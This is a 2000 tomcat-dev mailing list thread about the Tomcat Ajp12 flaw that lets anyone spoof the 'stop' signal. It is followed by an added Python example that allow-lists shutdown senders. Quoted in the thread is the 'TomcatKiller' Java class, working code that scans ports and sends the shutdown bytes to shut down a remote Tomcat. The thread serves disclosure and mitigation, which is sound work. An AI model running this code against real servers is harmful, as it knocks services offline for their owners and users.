tomcat-dev mailing list archives

From Glenn Nielsen <gl...@voyager.apg.more.net>
Subject Re: Tomcat Security Vulnerability
Date Fri, 06 Oct 2000 15:11:13 GMT
Use of the Java SecurityManager requires a JVM version >= 1.2.
And we are still committed to shipping a version of Tomcat that
compiles/runs under JVM 1.1.x.  So I don't think we should setup
the security manager by default.  We might be able to provide an
example server.xml and tomcat.policy file.  I might have to make
some minor changes to the tomcat_security.html docs from 3.3 so
that it matches the 3.2 release.

I have not been playing around with the 3.2 release branch, only
the 3.3dev branch.  I'll get 3.2 release and do a final test of
configuring/using the security manager and update the tomcat_security.html
file for the 3.2 release.

Regards,

Glenn

Michael Percy wrote:
> 
> Then we need to get all the latest (applicable) docs into the 3.2 release...
> and get everyone off of 3.1 and onto 3.2 ASAP. Possibly configure Tomcat to
> build with this packet filtering on the standard port(s) by default?
> 
> Regards,
> Mike
> 
> > -----Original Message-----
> > From: Glenn Nielsen [mailto:glenn@voyager.apg.more.net]
> > Sent: Thursday, October 05, 2000 5:20 PM
> > To: tomcat-dev@jakarta.apache.org
> > Subject: Re: Tomcat Security Vulnerability
> >
> >
> > If you checkout the 3.3dev version from CVS you will find a link in the
> > docs to tomcat_security.html.  This page documents how to use Tomcat
> > with the java security manager.  In that doc it shows an example of how
> > to configure a tomcat.policy file to do IP filtering of where tomcat will
> > accept requests from on port 8007 using the java security manager.
> >
> > As of tomcat 3.2, support for the java security manager has been added.
> >
> > Regards,
> >
> > Glenn
> >
> > Michael Percy wrote:
> > >
> > > All,
> > > Since I am uncertain how many of you check the tomcat-user list often, and I
> > > am not personally a Java developer, I wanted to get you all in the loop on
> > > this (and hopefully get some discussion going on a solution). What I am
> > > talking about is the "Tomcat Killer" thread on tomcat-user over the past
> > > hour. I have pasted in the mentioned thread below, in hopes that the people
> > > who can do something about it (the developers) will have comments on it. I am
> > > also curious as to whether or not ajpv13 is susceptible to this kind of
> > > attack, and am not sure how to go about finding out.
> > >
> > > Regards,
> > >
> > > Michael Percy
> > > QA Automation Eng.
> > > Portera Systems
> > >
> > > > -----Original Message-----
> > > > From: Michael Percy [mailto:mpercy@portera.com]
> > > > Sent: Thursday, October 05, 2000 1:36 PM
> > > > To: 'tomcat-user@jakarta.apache.org'
> > > > Subject: RE: Tomcat Killer
> > > >
> > > >
> > > > I'd like to point out that many people who wish to run Tomcat (at home, on a
> > > > LAN, etc.) do not have a spare machine/router to filter packets. Plus, many
> > > > setups include multiple ports on which different connectors run (to keep
> > > > configurations separate, etc.) so one cannot just firewall 8007 and proclaim
> > > > all is well. This is very dangerous and should be changed/patched/upgraded!
> > > > If Tomcat requires a firewall to be run safely, then it is NOT a secure
> > > > product (it relies on the security of other, unrelated people and
> > > > products!). This must be taken care of.
> > > >
> > > > On a related note, does anyone know if the JNI connector is susceptible to
> > > > this? If not, then this can be a short-term workaround (does it work yet?).
> > > >
> > > >
> > > > Regards,
> > > >
> > > > Michael Percy
> > > > QA Automation Eng.
> > > > Portera Systems
> > > >
> > > >
> > > > > -----Original Message-----
> > > > > From: Josh Knowles [mailto:josh.knowles@worldwidepackets.com]
> > > > > Sent: Thursday, October 05, 2000 1:27 PM
> > > > > To: 'tomcat-user@jakarta.apache.org'
> > > > > Subject: RE: Tomcat Killer
> > > > >
> > > > >
> > > > > You would think that as long as your firewall only allows access to port 80
> > > > > and or 8080 and not 8007 then you would be fine.  Nice find though.
> > > > >
> > > > > Josh
> > > > >
> > > > > -----Original Message-----
> > > > > From: Sean Schofield [mailto:sean@schof.com]
> > > > > Sent: Thursday, October 05, 2000 1:23 PM
> > > > > To: tomcat-user@jakarta.apache.org
> > > > > Subject: Re: Tomcat Killer
> > > > >
> > > > >
> > > > > Cool find!
> > > > >
> > > > > Couldn't this be protected against by a firewall filtering incoming traffic
> > > > > so both Apache and Tomcat are behind a firewall to the Internet and
> > > > > another firewall between these servers and the LAN?  Then you would only
> > > > > have to worry about other servlets, etc. within the firewall messing things
> > > > > up.  And even then I think you need root to create sockets don't you?
> > > > >
> > > > > Should this be posted to Bugtraq?
> > > > >
> > > > > - schof
> > > > >
> > > > > At 12:51 PM 10/5/00 -0700, you wrote:
> > > > >
> > > > > >Hi all, just a word of warning about Tomcat 3.1 and from what I can
> > > > > >tell, 3.2beta4.  Looking at the source code, if you're using Ajp12 for
> > > > > >the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
> > > > > >batch/shell file does its job by sending "exit please" bytes to
> > > > > >Tomcat.  It doesn't take much to spoof this, here's my TomcatKiller
> > > > > >class below.  Just guess a host and port which may have Tomcat
> > > > > >running, and over it goes...
> > > > > >
> > > > > >I patched the sources so hopefully it won't happen to me ;)
> > > > > >
> > > > > >
> > > > > >import java.net.*;
> > > > > >import java.io.*;
> > > > > >
> > > > > >public class TomcatKiller {
> > > > > >
> > > > > >         static public void main( String[] args ) {
> > > > > >
> > > > > >                 final byte SIGNAL = (byte)254;
> > > > > >                 final byte BYEBYE = (byte)15;
> > > > > >                 byte[] msg = { SIGNAL, BYEBYE };
> > > > > >
> > > > > >                 int min = 8007, max = 8007;
> > > > > >                 String host = args[0];
> > > > > >
> > > > > >                 try {
> > > > > >                         if( args.length > 1 )
> > > > > >                                 min = max = Integer.parseInt( args[1] );
> > > > > >                         if( args.length > 2 )
> > > > > >                                 max = Integer.parseInt( args[2] );
> > > > > >                         if( min > max ) {
> > > > > >                                 int tmp = min;
> > > > > >                                 min = max;
> > > > > >                                 max = tmp;
> > > > > >                         }
> > > > > >                         for( int i = min; i <= max; i++ ) {
> > > > > >                                 try {
> > > > > >                                         Socket s = new Socket( host, i );
> > > > > >                                         OutputStream os = s.getOutputStream();
> > > > > >                                         os.write( msg );
> > > > > >                                         os.flush();
> > > > > >                                         break;
> > > > > >                                 } catch( ConnectException ce ) {
> > > > > >                                         System.err.println( "conn refused " + i );
> > > > > >                                 } catch( IOException ioe ) {
> > > > > >                                         ioe.printStackTrace();
> > > > > >                                         break;
> > > > > >                                 }
> > > > > >                         }
> > > > > >                 } catch( Exception e ) {
> > > > > >                         e.printStackTrace();
> > > > > >                         System.exit( 1 );
> > > > > >                 }
> > > > > >         }
> > > > > >}
> > > > > >
> > > > > >// eof
> > > > > >
> > > > > >
> > > > > >stu
> > > > > >
> > > > > >
> > > > > >--
> > > > > >Stuart Maclean, Research Associate
> > > > > >University of Washington
> > > > > >ITS Research Program, College of Engineering
> > > > > >Box 352500
> > > > > >Seattle, WA 98195-2500
> > > > > >Tel: (206) 543-0637
> > > > > >http://www.its.washington.edu
> > > > >
> > > >
> > >
> > >
> > > ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
> > > For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org
> >
> 

-- 
----------------------------------------------------------------------
Glenn Nielsen             glenn@more.net | /* Spelin donut madder    |
MOREnet System Programming               |  * if iz ina coment.      |
Missouri Research and Education Network  |  */                       |
----------------------------------------------------------------------
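As an added illustration of the source-address check that the tomcat.policy IP filtering discussed above performs (this is not code from the thread or from Tomcat itself): a listener that only honours the two-byte Ajp12 shutdown signal quoted in the thread when it comes from an allow-listed peer, and records any other shutdown attempt as an alert for monitoring. The CIDR allow list, the function names and the loopback demo are assumptions; the client that sends the signal is constructed inline.

```python
import ipaddress
import socket

# Ajp12 shutdown signal as quoted in the thread: SIGNAL (254) followed by BYEBYE (15).
AJP12_SHUTDOWN = bytes([254, 15])
AJP12_PORT = 8007  # default Ajp12 port discussed in the thread (not used by the demo)


def classify_ajp12_peer(peer_ip, first_bytes, allowed_cidrs):
    """Decide what an Ajp12 listener should do with the first bytes from a peer.

    Returns "request" for ordinary traffic, "shutdown" when the shutdown signal
    arrives from an address inside allowed_cidrs (assumed allow list of CIDR
    strings), and "spoofed-shutdown" when it arrives from anywhere else, which
    is the case the TomcatKiller class relies on.
    """
    if first_bytes[:2] != AJP12_SHUTDOWN:
        return "request"
    addr = ipaddress.ip_address(peer_ip)
    if any(addr in ipaddress.ip_network(cidr) for cidr in allowed_cidrs):
        return "shutdown"
    return "spoofed-shutdown"


def guarded_accept_once(listener, allowed_cidrs, alerts):
    """Accept one connection and apply the source-address check before a
    shutdown signal is honoured; rejected signals are appended to `alerts`."""
    conn, (peer_ip, peer_port) = listener.accept()
    with conn:
        verdict = classify_ajp12_peer(peer_ip, conn.recv(2), allowed_cidrs)
        if verdict == "spoofed-shutdown":
            alerts.append("unauthorised Ajp12 shutdown from %s:%d" % (peer_ip, peer_port))
        return verdict


def demo(allowed_cidrs):
    """Constructed demo: a loopback listener on an ephemeral port receives the two
    shutdown bytes from a local client; the verdict depends only on the allow list."""
    alerts = []
    with socket.socket() as srv:
        srv.bind(("127.0.0.1", 0))
        srv.listen(1)
        port = srv.getsockname()[1]
        with socket.create_connection(("127.0.0.1", port)) as cli:
            cli.sendall(AJP12_SHUTDOWN)
            verdict = guarded_accept_once(srv, allowed_cidrs, alerts)
    return verdict, alerts


if __name__ == "__main__":
    print(demo(["127.0.0.0/8"]))   # loopback allowed: verdict "shutdown", no alerts
    print(demo(["192.0.2.0/24"]))  # loopback not allowed: "spoofed-shutdown", one alert
```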
